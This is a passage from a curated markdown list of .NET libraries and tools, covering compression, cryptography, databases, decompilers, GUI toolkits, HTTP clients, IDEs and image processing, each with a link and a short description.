* [Amplifier.NET](https://github.com/tech-quantum/Amplifier.NET) - Write and compile your own kernel function using C# and Amplifier will take care of running it on your favorite hardware. Amplifier allows .NET developers to easily run complex applications with intensive mathematical computation on Intel CPU/GPU, NVIDIA, AMD without writing any additional C kernel code.
## Compression
* [SharpCompress](https://github.com/adamhathcock/sharpcompress) - SharpCompress is a compression library for .NET/Mono/Silverlight/WP7 that can unrar, un7zip, unzip, untar unbzip2 and ungzip with forward-only reading and file random access APIs. Write support for zip/tar/bzip2/gzip are implemented
* [DotNetZip.Semverd](https://github.com/haf/DotNetZip.Semverd) - An open-source project that delivers a .NET library for handling ZIP files, and some associated tools. (fork of [**Unmaintained** DotNetZip](https://archive.codeplex.com/?p=dotnetzip))
* [SharpZipLib](https://icsharpcode.github.io/SharpZipLib/) - a Zip, GZip, Tar and BZip2 library written entirely in C# for the .NET platform
* [Snappy for Windows](https://snappy.machinezoo.com/) - Snappy compression library for .NET baked on P/Invoke
* [Snappy.Sharp](https://github.com/jeffesp/Snappy.Sharp) - An implementation of Google's Snappy compression algorithm in C#.
## Continuous Integration
* [TeamCity](https://www.jetbrains.com/teamcity/) - Ready to work, extensible and developer-friendly build server — out of the box **[$]**
* [MyGet](https://www.myget.org/) - Continuous Integration and Deployment, Hosted Package Repository for NuGet, NPM, Bower and VSIX **[$]**
* [AppVeyor](https://www.appveyor.com/) - .NET Continuous Integration and Deployment as a service. **[$]** **[Free for OSS]**
## Cryptography
* [BouncyCastle](https://bouncycastle.org/) - Together with the .Net System.Security.Cryptography, the reference implementation for cryptographic algorithms on the CLR.
* [HashLib](https://archive.codeplex.com/?p=hashlib) - HashLib is a collection of nearly all hash algorithms you've ever seen, it supports almost everything and is very easy to use
* [libsodium-net](https://github.com/adamcaudill/libsodium-net) - libsodium for .NET - A secure cryptographic library
* [NaCl.Core](https://github.com/daviddesmet/NaCl.Core) - A managed-only cryptography library for .NET which provides modern cryptographic primitives.
* [Paseto.Core](https://github.com/daviddesmet/paseto-dotnet) - A Paseto (Platform-Agnostic Security Tokens) implementation for .NET
* [Pkcs11Interop](https://github.com/Pkcs11Interop/Pkcs11Interop) - Managed .NET wrapper for unmanaged PKCS#11 libraries that provide access to the cryptographic hardware
* [StreamCryptor](https://github.com/bitbeans/StreamCryptor) - Stream encryption & decryption with libsodium and protobuf
* [SecurityDriven.Inferno](https://github.com/sdrapkin/SecurityDriven.Inferno) - .NET crypto library. Professionally audited.
* [CryptoNet](https://github.com/maythamfahmi/CryptoNet) - .NET simple crypto library. Native c#.
## Database
* [SliccDB](https://github.com/pmikstacki/SliccDB) - Lightweight Embedded (In-Memory) Graph Database for .net
* [RocksDB](https://github.com/curiosity-ai/rocksdb-sharp) - C# binding for Facebook's RocksDB Key-Value store + native builds for Windows, macOS and Linux
* [BrightstarDb](https://github.com/BrightstarDB/BrightstarDB) - BrightstarDB is a native .NET RDF triple store
* [DBreeze](https://github.com/hhblaze/DBreeze) - DBreeze Database is an open-source embedded Key-Value store
* [Event Store](https://github.com/EventStore/EventStore) - The open-source, functional database with Complex Event Processing in JavaScript
* [LiteDB](https://github.com/mbdavid/LiteDB) - A .NET NoSQL Document Store in a single data file - https://www.litedb.org
* [RavenDB](https://github.com/ravendb/ravendb) - A LINQ-enabled document database for .NET
* [Marten](https://github.com/JasperFx/marten) - PostgreSQL as a document database and event store for .NET applications
* [Realm Xamarin](https://github.com/realm/realm-dotnet) - A fast, easy-to-use alternative to SQLite & ORMs - https://realm.io/docs/dotnet/latest/
* [Streamstone](https://github.com/yevhen/Streamstone) - Event store for Azure Table Storage
* [StringDB](https://github.com/SirJosh3917/StringDB) - StringDB is a modular, key/value pair archival DB designed to consume tiny amounts of ram & produce tiny databases.
* [Ignite](https://github.com/apache/ignite) - Distributed in-memory platform: document database with SQL and LINQ support; distributed computations; distributed services and events.
* [Yessql](https://github.com/sebastienros/yessql) - A .NET document database working on any RDBMS
* [JsonFlatFileDataStore](https://github.com/ttu/json-flatfile-datastore) - Simple JSON flat file data store with support for typed and dynamic data
* [Db4o-gpl](https://github.com/iboxdb/db4o-gpl) - Object-oriented database, embedded and remote connections supported.
* [ZoneTree](https://github.com/koculu/ZoneTree) - Persistent, high-performance, transactional, and ACID-compliant ordered key-value database for .NET.
## Database Drivers
* [MySQL Connector](https://dev.mysql.com/downloads/connector/net/) - Connector/Net is a fully-managed ADO.NET driver for MySQL
* [Npgsql](https://github.com/npgsql/Npgsql) - .NET data provider for PostgreSQL
* [MongoDB](https://github.com/mongodb/mongo-csharp-driver) - Official MongoDB C# driver
* [RethinkDb.Driver](https://github.com/bchavez/RethinkDb.Driver/) - A RethinkDB database driver in C# striving for 100% ReQL API compatibility and completeness.
* [ServiceStack Redis](https://github.com/ServiceStack/ServiceStack.Redis) - .NET's leading C# Redis client
* [StackExchange Redis](https://github.com/StackExchange/StackExchange.Redis) - General purpose Redis client from StackExchange
* [Cassandra](https://github.com/datastax/csharp-driver) - DataStax .NET driver for Apache Cassandra
* [Couchbase](https://github.com/couchbase/couchbase-net-client) - Official Couchbase .NET client library, based on the Enyim memcached client
* [Firebird.NET](https://sourceforge.net/projects/firebird/) - The .NET Data provider is written in C# and provides a high-performance, native implementation of the Firebird API
* [FluentStorage](https://github.com/robinrodricks/FluentStorage) - A polycloud .NET cloud storage abstraction layer originally known as Storage.Net. Provides a generic interface for Blob storage (AWS S3, GCP, FTP, SFTP, Azure Blob/File/Event Hub/Data Lake) and Messaging (AWS SQS, Azure Queue/ServiceBus).
* [Stowage](https://github.com/aloneguid/stowage) - Bloat-free zero dependency .NET cloud storage kit that supports at minimum THE major cloud providers.
## Datetime
* [NodaTime](https://github.com/nodatime/nodatime) - Noda Time is an alternative date and time API for .NET. It helps you to think about your data more clearly, and express operations on that data more precisely. https://nodatime.org/
* [DateTimeExtensions](https://github.com/joaomatossilva/DateTimeExtensions) - Common Date Time operations on the form of extensions to `System.DateTime`, including holidays and working days calculations on several culture locales.
* [Exceptionless.DateTimeExtensions](https://github.com/exceptionless/Exceptionless.DateTimeExtensions) - DateTimeRange, Business Day and various `DateTime`, `DateTimeOffset`, `TimeSpan` extension methods.
## Decompilation
* [dnSpy](https://github.com/0xd4d/dnSpy) - open-source .NET assembly browser, editor, decompiler and debugger
* [ILSpy](https://ilspy.net/) - ILSpy is the open-source .NET assembly browser and decompiler
* [JustDecompile Engine](https://github.com/telerik/JustDecompileEngine) - The decompilation engine of [JustDecompile](https://www.telerik.com/products/decompiler.aspx)
* [dotPeek](https://www.jetbrains.com/decompiler/) - Free-of-charge standalone tool based on ReSharper's bundled decompiler. It can reliably decompile any .NET assembly into equivalent C# or IL code. It can create Visual Studio solutions based on the original binary files in a straight-forward way. **[Proprietary]** **[Free]**
## Deployment
* [Unfold](https://github.com/thomasvm/unfold) - PowerShell-based deployment solution for .NET web applications
* [DbUp](https://github.com/DbUp/DbUp) - .NET library that helps you to deploy changes to SQL Server databases. It tracks which SQL scripts have been run already, and runs the change scripts that are needed to get your database up to date
* [Octo Pack](https://github.com/OctopusDeploy/OctoPack) - Used to build NuGet packages of your application for deployment using tools such as Octopus Deploy
* [yuniql](https://github.com/rdagumampan/yuniql) - Free and open source schema versioning and migration tool made with .NET Core. Run migrations with plain SQL, arrange versions in ordinary folders and seed your data from CSV via stand-alone CLI (no CLR needed), Azure Pipelines, Docker or ASP.NET Core code. https://yuniql.io
## DirectX
* [Vortice.Windows](https://github.com/amerkoleci/Vortice.Windows) - Cross platform .NET standard libraries for DirectX, WIC, Direct2D1, XInput, XAudio and X3DAudio
## Distributed Computing
* [.NEXT Raft](https://github.com/dotnet/dotNext) - Raft implementation for .NET and ASP.NET Core that allows to build clustered microservices powered by distributed consensus and replication
* [Orleans](https://github.com/dotnet/orleans) - Orleans is a framework that provides a straight-forward approach to building distributed high-scale computing applications, without the need to learn and apply complex concurrency or other scaling patterns. It was created by Microsoft Research.
* [Orleankka](https://github.com/OrleansContrib/Orleankka) - Orleankka is a functional API for Microsoft Orleans framework. It is highly suitable for scenarios where having composable, uniform communication interface is preferable, such as: CQRS, event-sourcing, re-routing, FSM, etc. Additional API available for F# called Orleankka.FSharp.
* [Akka.net](https://github.com/akkadotnet/akka.net) - Akka.NET is a port of the popular Java/Scala framework Akka to .NET. This is a community-driven port and is not affiliated with Typesafe who makes the original Java/Scala version.
* [Zebus](https://github.com/Abc-Arbitrage/Zebus) - Zebus is a lightweight, highly versatile, peer-to-peer service bus, built with CQRS principles in mind. It allows applications to communicate with each other in a fast and easy manner. Most of the complexity is hidden in the library and you can focus on writing code that matters to you, not debugging messaging code. A very fundamental base for any distributed application.
* [FsShelter](https://github.com/Prolucid/FsShelter) - F# library for authoring [Apache Storm](https://storm.apache.org) components and topologies. Offering high-level abstractions for distributed and fault-tolerant event stream processing.
* [Foundatio](https://github.com/FoundatioFx/Foundatio#jobs) - Pluggable foundation blocks for building distributed apps.
* [MBrace](https://github.com/mbraceproject) - Integrated Data Scripting for the Cloud
* [protoactor-dotnet](https://github.com/AsynkronIT/protoactor-dotnet) - Proto Actor - Ultra fast distributed actors for Golang and C#
## DLR
* [cmd](https://github.com/manojlds/cmd) - C# library to run external programs in a simpler way. Demonstration of "dynamic" features of C#.
## Documentation
* [Sandcastle](https://github.com/EWSoftware/SHFB) - Sandcastle Help File Builder similar to NDoc
* [SourceBrowser](https://github.com/KirillOsenkov/SourceBrowser) - Source browser website generator that powers https://referencesource.microsoft.com
* [Swashbuckle](https://github.com/domaindrivendev/Swashbuckle.WebApi) - Seamlessly adds a Swagger to Web API projects.
* [F# Formatting](https://fsprojects.github.io/FSharp.Formatting/) - Tools for documenting F# and C# projects from F# script files, Markdown documents and inline XML or Markdown comments
* [DocFX](https://github.com/dotnet/docfx) - Tools for building and publishing API documentation for .NET projects
* [DocNet](https://github.com/FransBouma/DocNet) - Your friendly static documentation generator, using markdown files to build the content.
## E-Commerce and Payments
* [Paypal Merchant SDK](https://github.com/paypal/merchant-sdk-dotnet) - Official PayPal Merchant SDK for .NET
* [NopCommerce](https://github.com/nopSolutions/nopCommerce) - nopCommerce. Free open-source e-commerce shopping cart (ASP.NET Core)
* [ServiceStack.Stripe](https://github.com/ServiceStack/Stripe) - Typed .NET clients for stripe.com REST APIs
* [SmartStoreNET](https://github.com/smartstore/SmartStoreNET) - Free ASP.NET MVC e-commerce Shopping Cart Solution
* [Stripe.Net](https://github.com/stripe/stripe-dotnet) - Stripe.net is a full service .NET API for https://stripe.com/
* [Virto Commerce](https://github.com/VirtoCommerce/vc-platform) - Virto Commerce is the second generation release and is the only enterprise level e-commerce product fully available under Open Source license. Virto Commerce is based on .NET 4.5 with extensive use of MVC, IoC, EF, Azure, AngularJS and many other cutting edge technologies. It can be deployed in Microsoft Cloud (Azure), Amazon Web Services (AWS) and on-premise. https://virtocommerce.com
* [SimplCommerce](https://github.com/simplcommerce/simplcommerce) - Super simple ecommerce system built on .NET Core. Simple to use and easy to customize. Thanks to .NET Core, you can run the SimplCommerce on Windows, Linux. With various RDBMS: Microsoft SQL Server, PostgreSQL, MySQL
* [GrandNode](https://github.com/grandnode/grandnode2) - Headless, multi-vendor, multi-tenant, the most advanced open source e-commerce platform based on .NET Core 5.0 and MongoDB.
* [Square](https://github.com/square/connect-csharp-sdk) - The official SDK for Square payments and other Square APIs.
* [Adyen](https://github.com/Adyen/adyen-dotnet-api-library) - The official Adyen Payment API Library for .NET
## Emulators
* [Blzhawk](https://github.com/TASEmulators/BizHawk) - BizHawk is a multi-system emulator written in C#. BizHawk provides nice features for casual gamers such as full screen, and joypad support in addition to full rerecording and debugging tools for all system cores.
* [Ryujinx](https://github.com/Ryujinx/Ryujinx) - Experimental Nintendo Switch Emulator written in C#
## Environment Management
* [Dotnet CLI](https://github.com/dotnet/cli) - The cross-platform .NET Core command-line toolchain utility.
## ETL
* [Cinchoo ETL](https://github.com/Cinchoo/ChoETL) - ETL Framework for .NET (Read / Write CSV, Flat, Xml, JSON, Key-Value formatted files)
* [Reactive ETL](https://archive.codeplex.com/?p=reactiveetl) - Reactive ETL is a rewrite of Rhino ETL using the reactive extensions for .NET
## Event aggregator and messenger
* [Mediator.Net](https://github.com/mayuanyang/Mediator.Net) - A simple mediator for .NET for sending command, publishing event and request response with pipelines supported
* [MediatR](https://github.com/jbogard/MediatR) - Simple, unambitious mediator implementation in .NET
* [Rx Event Aggregator](https://mikebridge.github.io/articles/csharp-domain-event-aggregator/) - Super-simple Reactive-Extension code from Reactive.EventAggregator
* [TinyMessenger](https://github.com/grumpydev/TinyMessenger) - A lightweight event aggregator/messenger for loosely coupled communication.
* [Xer.Cqrs](https://github.com/XerProjects/Xer.Cqrs) - A simple library for creating applications based on the CQRS pattern with support for attribute routing and hosted handlers. Developed in C# targeting .NET Standard 1.0.
* [FluentMediator](https://github.com/ivanpaulovich/FluentMediator) - FluentMediator is an unobtrusive library that allows developers to build custom pipelines for Commands, Queries and Events
* [EventFlow](https://github.com/eventflow/EventFlow) - EventFlow is an Async/await first CQRS and Event Sourcing DDD framework for .NET
## Exceptions
* [Exceptionless](https://github.com/exceptionless/Exceptionless.Net) - Exceptionless .NET Client
## Extensions
* [ExtensionMethods.Net](https://www.extensionmethod.net/csharp) - Site with collection of extension methods
* [Z.ExtensionMethods](https://github.com/zzzprojects/Z.ExtensionMethods) - Over a 1000 useful extension methods
## Functional programming
* [Curryfy](https://github.com/leandromoh/Curryfy) - Provides strongly typed extensions methods for C# delegates to take advantages of functional programming techniques, like currying and partial application.
* [language-ext](https://github.com/louthy/language-ext) - This library uses and abuses the features of C# 6+ to provide a functional 'Base class library', that, if you squint, can look like extensions to the language itself. It also includes an 'Erlang like' process system (actors) that can optionally persist messages and state to Redis (note you can use it without Redis for in-app messaging). The process system additionally supports Rx streams of messages and state allowing for a complete system of reactive events and message dispatch.
* [Optional](https://github.com/nlkl/Optional) - A robust option type for C#
* [JFlepp.Maybe](https://github.com/jflepp/JFlepp.Maybe) - A Maybe type for C#, aimed as an idiomatic port of the option type in F# to C#
* [Optuple](https://github.com/atifaziz/Optuple) - .NET Standard Library for giving `(bool, T)` Option-like semantics in a non-obtrusive way; this is, there is no new option type dependency for a library or its users.
* [MoreLinq](https://github.com/MoreLinq/MoreLinq) - Provides extra methods to LINQ to Objects.
## Game
* [MonoGame](https://github.com/MonoGame/MonoGame) - One framework for creating powerful cross-platform games
* [FNA](https://github.com/FNA-XNA/FNA) - FNA is an XNA4 reimplementation that focuses solely on developing a fully accurate XNA4 runtime for the desktop
* [CocosSharp](https://github.com/mono/CocosSharp) - CocosSharp is a C# implementation of the Cocos2D and Cocos3D APIs that runs on any platform where MonoGame runs
* [Duality](https://github.com/AdamsLair/duality) - Duality is a 2D game development framework. Focused on modularity, comes with a visual editor.
* [Stride Game Engine](https://stride3d.net/ ) - Stride Game Engine is a 2D/3D cross-platform game engine featuring a scene editor, particles, physically based rendering (PBR), scripting, and much more
* [Wave Engine](https://waveengine.net/Engine) - Wave engine is a free C# component-based modern game engine which allows you to create cross-platform games supporting Kinect, Oculus Rift, Vuforia, Cardboard, Leap Motion and much more. **[Free][Proprietary]**
* [UrhoSharp](https://github.com/xamarin/urho) - UrhoSharp is a C# implementation of the Urho3D game engine that runs on iOS, Mac, Windows, Android and Linux systems
* [Nez](https://github.com/prime31/Nez) - Nez is a free 2D-focused framework that works with MonoGame and FNA
* [BEPUphysics](https://github.com/bepu/bepuphysics2) - BEPUphysics is a pure C# 3D physics library
* [Devtodev](https://github.com/devtodev-analytics/winstore-sdk) - A full-cycle analytics solution for game developers.
* [UnrealCLR](https://github.com/nxrighthere/UnrealCLR) - Unreal Engine .NET Core integration
* [osu!framework](https://github.com/ppy/osu-framework) - A 2D application/game written with amazing games in mind.
## GIS
* [NetTopologySuite](https://github.com/NetTopologySuite/NetTopologySuite/) A .NET GIS solution that is fast and reliable for the .NET platform
* [SharpMap](https://github.com/SharpMap) An easy-to-use mapping library for use in web and desktop applications
* [OsmSharp](https://www.osmsharp.com/) - C# library to work with OpenStreetMap (OSM) data. Provides reading, writing and route-planning for OSM data.
* [GeoJSON4EntityFramework](https://github.com/alatas/GeoJSON4EntityFramework) - A library to create GeoJSON from Entity Framework Spatial Data or Well-Known Text (WKT) inputs.
* [GeoJSON.NET](https://github.com/GeoJSON-Net/GeoJSON.Net) - .Net library for GeoJSON types & corresponding Json.Net (de)serializers
* [CoordinateSharp](https://github.com/Tronald/CoordinateSharp) - Easily parse or convert coordinate formats and calculate location based solar/lunar information.
* [DEM Net Elevation API](https://github.com/dem-net/dem.net) - .Net library for Digital Elevation Models, allows 3D terrain generation in glTF / STL format.
## Git Tools
* [Husky.Net](https://github.com/alirezanet/Husky.Net) - Git hooks made easy with Husky.Net internal task runner, You can use it to lint your commit messages, run tests, lint code, etc... when you commit or push. supports C# scripts, gitflow hooks, Multiple file states (staged, lastCommit, glob)
* [Bonobo Git Server](https://github.com/jakubgarfield/Bonobo-Git-Server) - Bonobo Git Server for Windows is a web application you can install on your IIS and easily manage and connect to your Git repositories. https://bonobogitserver.com/
* [GitExtensions](https://github.com/gitextensions/gitextensions) - GitExtensions is a shell extension, a Visual Studio 2008/2010/2012/2013 plugin and a standalone Git repository tool. https://gitextensions.github.io/
* [GitLink](https://github.com/GitTools/GitLink) - let's users step through their code hosted on GitHub or BitBucket
* [GitVersion](https://github.com/GitTools/GitVersion) - Generate a Semantic Version Number based on the state of your Git repository
* [LibGit2Sharp](https://github.com/libgit2/libgit2sharp) - LibGit2Sharp brings all the might and speed of libgit2, a native Git implementation, to the managed world of .NET and Mono.
* [GitRead.Net](https://github.com/kingsimmy/GitRead.Net) - GitRead.Net is a .NET Standard library which allows you to very easily interrogate a Git repository that you have on disk. It allows you to enumerate the commit log, count lines per file and list files changed by a commit.
* [NGit](https://github.com/mono/ngit) - NGit is a port of JGit to C#
* [posh-git](https://github.com/dahlbyk/posh-git) - A PowerShell environment for Git
* [RepoZ](https://github.com/awaescher/RepoZ) - A Git repository information aggregator with Windows Explorer & CLI-enhancements
* [Git Credential Manager for Windows](https://github.com/Microsoft/Git-Credential-Manager-for-Windows) - Helps solving issues of credentials, made by Microsoft
## Graphics
* [LibTessDotNet](https://github.com/speps/LibTessDotNet) - .NET port of the famous GLU Tessellator, triangulates polygons
* [Oxyplot](https://github.com/oxyplot/) - OxyPlot is a cross-platform plotting library for .NET
* [OpenTK](https://github.com/opentk/opentk) - The Open Toolkit is an advanced, low-level C# library that wraps OpenGL, OpenCL and OpenAL
* [NGraphics](https://github.com/praeclarum/NGraphics) - NGraphics is a cross-platform library for rendering vector graphics on .NET
* [Aspose.Drawing](https://products.aspose.com/drawing/net) - Fully managed, cross-platform, complete 2D graphic library for drawing text, geometries, and images, with System.Drawing compatible API. **[$]**
* [ScottPlot](https://swharden.com/scottplot/) - A plotting library to interactively displays large datasets. Line plots, bar charts, pie graphs, scatter plots, and more. It supports WinForms, WPF, Avalonia, Console.
* [LiveCharts2](https://github.com/beto-rodriguez/LiveCharts2) - Simple, flexible, interactive & powerful charts, maps, and gauges for .Net. LiveCharts2 supports WPF, WinForms, Xamarin, Avalonia, WinUI, UWP.
* [Helix Toolkit](https://www.helix-toolkit.org) - Helix Toolkit is a collection of 3D components for .NET
* [AssimpNet](https://bitbucket.org/Starnick/assimpnet) - A cross-platform .NET Standard wrapper for the Open Asset Importer ("Assimp"). The library enables importing, processing, and exporting of 3D models for rendering in graphics/game applications. Over 40 formats are supported for importing (e.g. OBJ, FBX, GLTF, 3DS, Collada) and a subset of those formats can be exported to (e.g. OBJ, GLTF, 3DS, Collada). Mesh processing features allow for mesh data to be generated or optimized for real-time rendering.
* [Silk.NET](https://github.com/Ultz/Silk.NET) - A cross-platform, high-performance, low-level .NET Standard wrapper for many advanced APIs such as OpenGL, OpenCL, OpenAL, OpenXR, Assimp, GLFW, as well as many others. In addition to wrapping over Native APIs, it also comes with its own Windowing and Input abstraction. This makes game and application development with Silk.NET a breeze, and has pretty much everything a 3D application developer would need.
* [Veldrid](https://github.com/mellinoe/veldrid) - A low-level, portable graphics and compute library for .NET
* [RealTimeGraphX](https://github.com/royben/RealTimeGraphX) - RealTimeGraphX is a data type agnostic, high performance plotting library for WPF, UWP and soon, Xamarin Forms.
* [VectSharp](https://github.com/arklumpus/VectSharp) - .NET library to create vector graphics and text, and then export it to PDF, SVG and raster image formats.
## GraphQL
* [GraphQL.NET](https://github.com/graphql-dotnet/graphql-dotnet) - Implementation of [Facebook's GraphQL](https://github.com/graphql/graphql-spec) in .Net
* [HotChocolate](https://github.com/ChilliCream/hotchocolate) - GraphQL server compatible to all GraphQL compliant clients like Strawberry Shake, Relay, Apollo Client, and various other clients and tools.
* [graphql-net](https://github.com/chkimes/graphql-net) - GraphQL to IQueryable for .NET.
* [EntityGraphQL](https://github.com/EntityGraphQL/EntityGraphQL) - library to build a GraphQL API on top of data model with the extensibility to easily bring multiple data sources together in the single GraphQL schema (EF is not a requirement - any ORM working with LinqProvider or an in-memory object will work).
* [ZeroQL](https://github.com/byme8/ZeroQL) - high-performance C#-friendly GraphQL client. It supports Linq-like syntax. It doesn't require Reflection.Emit or expressions. As a result, the runtime provides performance very close to a raw HTTP call.
## GUI
* [HandyControl](https://github.com/HandyOrg/HandyControl) - Contains some simple and commonly used WPF controls
* [Lara](https://github.com/integrativesoft/lara) - Lara Web Engine is a library for developing Web user interfaces in C#
* [QtSharp](https://github.com/ddobrev/QtSharp) - Mono/.NET Bindings for Qt
* [Qml.Net](https://github.com/qmlnet/qmlnet) - A cross-platform Qml/.NET integration for Mono/.NET/.NET Core
* [MahApps.Metro](https://github.com/MahApps/MahApps.Metro) - Toolkit for creating Metro-styled WPF apps
* [Callisto](https://github.com/timheuer/callisto) - A control toolkit for Windows 8 XAML applications. Contains some UI controls to make it easier to create Windows UI style apps for the Windows Store in accordance with Windows UI guidelines.
* [ObjectListView](http://objectlistview.sourceforge.net/cs/index.html) - ObjectListView is a C# wrapper around a .NET ListView. It makes the ListView much easier to use and teaches it some new tricks
* [DockPanelSuite](https://sourceforge.net/projects/dockpanelsuite/) - The Visual Studio inspired docking library for .NET WinForms
* [AvalonEdit](https://github.com/icsharpcode/AvalonEdit) - The WPF-based text editor component used in SharpDevelop
* [XWT](https://github.com/mono/xwt) - A cross-platform UI toolkit for creating desktop applications with .NET and Mono
* [Gtk#](https://github.com/mono/gtk-sharp) - Gtk# is a Mono/.NET binding to the cross platform Gtk+ GUI toolkit and the foundation of most GUI apps built with Mono
* [MaterialDesignInXamlToolkit](http://materialdesigninxaml.net/) - Toolkit for creating Material Design styled WPF apps
* [Eto.Forms](https://github.com/picoe/Eto) - Cross-platform GUI framework for desktop and mobile applications in .NET and Mono
* [Dragablz](https://github.com/ButchersBoy/Dragablz) - Dragable, tearable WPF tab control (similar to Chrome) which supports layouts and is full themeable, including themese compatible with MahApps and Material Design.
* [Fluent.Ribbon](https://github.com/fluentribbon/Fluent.Ribbon) - Fluent Ribbon Control Suite is a library that implements an Office- and Windows 8-like Ribbon for WPF.
* [Office Ribbon](https://github.com/RibbonWinForms/RibbonWinForms) - A library that implements MS Office Ribbon for WinForms.
* [MaterialSkin](https://github.com/IgnaceMaes/MaterialSkin) - Theming .NET WinForms, C# or VB.Net, to Google's Material Design principles.
* [Xamarin.Forms](https://github.com/xamarin/Xamarin.Forms) - Build native UIs for iOS, Android and Windows from a single, shared C# codebase.
* [SciterSharp](https://github.com/ramon-mendes/SciterSharp) - Create .NET cross-platform desktop apps using not just HTML, but all features of Sciter engine: CSS3, SVG, scripting, AJAX, <video>... Sciter is free for commercial use
* [Empty Keys UI](https://www.emptykeys.com/ui_library/) - Multi-platform and multi-engine XAML based user interface library **[Free][Proprietary]**
* [UWP Community Toolkit](https://github.com/windows-toolkit/WindowsCommunityToolkit) - The UWP Community Toolkit is a collection of helper functions, custom controls, and app services. It simplifies and demonstrates common developer tasks building UWP apps for Windows 10.
* [ScintillaNET](https://github.com/jacobslusser/ScintillaNET) - Windows Forms control for the Scintilla text editor component (Scintilla is used by Notepad++)
* [FastColoredTextBox](https://github.com/PavelTorgashov/FastColoredTextBox) - Fast Colored TextBox is text editor component for .NET. Allows you to create custom text editor with syntax highlighting. It works well with small, medium, large and very-very large files.
* [Avalonia](https://github.com/AvaloniaUI/Avalonia) - A multi-platform .NET UI framework (formerly known as Perspex).
* [Modern UI for WPF - MUI](https://github.com/firstfloorsoftware/mui) - Set of controls and styles to convert WPF applications into a great looking Modern UI apps.
* [WinApi](https://github.com/prasannavl/WinApi) - A simple, direct, ultra-thin CLR library for high-performance Win32 Native Interop with automation, windowing, DirectX, OpenGL and Skia helpers.
* [Neutronium](https://github.com/NeutroniumCore/Neutronium) - Build .NET desktop applications using HTML, CSS, javascript and MVVM bindings such as with WPF.
* [Ooui](https://github.com/praeclarum/Ooui) - A small cross-platform UI library that brings the simplicity of native UI development to the web
* [AdonisUI](https://github.com/benruehl/adonis-ui) - Lightweight UI toolkit for WPF applications offering classic but enhanced Windows visuals.
* [Windows UI Library](https://github.com/microsoft/microsoft-ui-xaml) - The Windows UI Library (WinUI) provides official native Microsoft UI controls and features for Windows UWP apps.
* [Bunifu UI Framework](https://bunifuframework.com) - Carefully crafted Winforms controls and components for creating stunning modern application UI. **[$]**
* [Ookii.Dialogs.Wpf](https://github.com/augustoproiete/ookii-dialogs-wpf) - Enable WPF applications to access common Windows dialogs such as task dialogs, credential dialog, progress dialog, folder browser dialog, and more
* [Ookii.Dialogs.WinForms](https://github.com/augustoproiete/ookii-dialogs-winforms) - Enable Windows Forms applications to access common Windows dialogs such as task dialogs, credential dialog, progress dialog, folder browser dialog, and more
* [UNO Platform](https://github.com/unoplatform) - The only platform for building native mobile, desktop and WebAssembly with C#, XAML from a single codebase. Open source and professionally supported. Website: [platform.uno](https://platform.uno/)
## HTML and CSS
* [AngleSharp](https://github.com/AngleSharp/AngleSharp) - Complete HTML5 DOM and CSS3 OM construction
* [dotless](https://github.com/dotless/dotless) - .NET port of the Ruby Less CSS lib http://www.dotlesscss.org
* [ExCSS](https://github.com/TylerBrinks/ExCSS) - CSS3 parser library for C#
* [HtmlAgilityPack](https://html-agility-pack.net/?z=codeplex) - an agile HTML parser that builds a read/write DOM and supports plain XPath or XSLT
* [LibSass Host](https://github.com/Taritsyn/LibSassHost) - .NET wrapper around the [libSass](https://sass-lang.com/libsass) library with the ability to support a virtual file system
* [LtGt](https://github.com/Tyrrrz/LtGt) - lightweight HTML processor, can be used to parse and navigate DOM, handles CSS selectors, can convert to Linq2Xml, easily extensible, and more.
## HTTP
* [Tiny.RestClient](https://github.com/jgiacomini/Tiny.RestClient) - Simpliest Fluent REST client for .NET.
* [Http.fs](https://github.com/haf/Http.fs) - A functional HTTP client for F#.
* [RestSharp](https://github.com/restsharp/RestSharp) - Simple REST and HTTP API client for .NET
* [Flurl](https://flurl.dev) - Fluent, portable, testable REST/HTTP client library
* [EasyHttp](https://github.com/EasyHttp/EasyHttp) - HTTP library for C#
* [Refit](https://github.com/reactiveui/refit) - The automatic type-safe REST library for Xamarin and .NET
* [RestEase](https://github.com/canton7/RestEase) - Easy-to-use typesafe REST API client library, which is simple and customisable. Heavily inspired by Refit
* [RestLess](https://github.com/letsar/RestLess) - The automatic type-safe-reflectionless REST API client library for .Net Standard.
* [HttpClientGoodies](https://github.com/jeffijoe/httpclientgoodies.net) - utilities for working with `HttpClient`
* [WebApiClient](https://github.com/dotnetcore/WebApiClient) An open source project based on the HttpClient. You only need to define the c# interface and modify the related features to invoke the client library of the remote http interface asynchronously.
* [Apizr](https://github.com/Respawnsive/Apizr) Refit based web api client, but resilient (retry, connectivity, cache, auth, log, priority, etc...).
## IDE
* [AvalonStudio](https://github.com/VitalElement/AvalonStudio) - An extensible, cross platform IDE written in C# for Embedded C/C++, .NET Core, Avalonia and Typescript
* [SharpDevelop](https://github.com/icsharpcode/SharpDevelop) - A free IDE for .NET programming languages
* [MonoDevelop](https://github.com/mono/monodevelop) - MonoDevelop is a cross-platform IDE mostly aimed at Mono/.NET developers
* [Visual Studio Express](https://visualstudio.microsoft.com/vs/express/) - The free lightweight version of Visual Studio for .NET programming.
* [Visual Studio Community](https://visualstudio.microsoft.com/vs/community/) - A full-featured IDE
* [Waf DotNetPad](https://jbe2277.github.io/dotnetpad/) - A simple and fast code editor that makes fun program with C# or Visual Basic.
* [Visual Studio Code](https://code.visualstudio.com/) - Excellent open source editor from Microsoft, based on Electron.
* [Ionide](http://ionide.io/) - An Atom Editor and Visual Studio Code package suite for cross platform F# development.
* [Rider](https://www.jetbrains.com/rider/) - A cross-platform C# IDE based on the IntelliJ platform and ReSharper
* [RoslynPad](https://github.com/aelij/RoslynPad) - A simple C# editor based on Roslyn and AvalonEdit.
* [Consulo](https://consulo.io) - A cross-platform IDE with C# & Java support, fork of IntelliJ IDEA Community Edition
* [vvvv](https://visualprogramming.net) A visual live-programming environment for .NET **[Free for OSS]**
* * [CSharp Analyzer by MongoDB](https://github.com/mongodb/mongo-csharp-analyzer) A free Visual Studio Extension for MongoDB users, helping translate your code into MongoDB queries
## Image Processing
* [ImageWizard](https://github.com/usercode/ImageWizard) - Image processing webservice based on ASP.NET Core and ImageSharp / SkiaSharp / SvgNet / DocNET
* [ImageResizer](https://imageresizing.net/) - Add commands to image URLs to get altered versions in milliseconds. Resizing, editing etc of images in real-time.
* [ImageProcessor](https://github.com/JimBobSquarePants/ImageProcessor) - Open-source .NET library to manipulate images on-the-fly.
* [ImageSharp](https://github.com/SixLabors/ImageSharp) - Fully managed cross-platform library for processing of image files.
* [MagicScaler](https://github.com/saucecontrol/PhotoSauce) - High-performance image processing pipeline for .NET, focused on making complex imaging tasks simple.
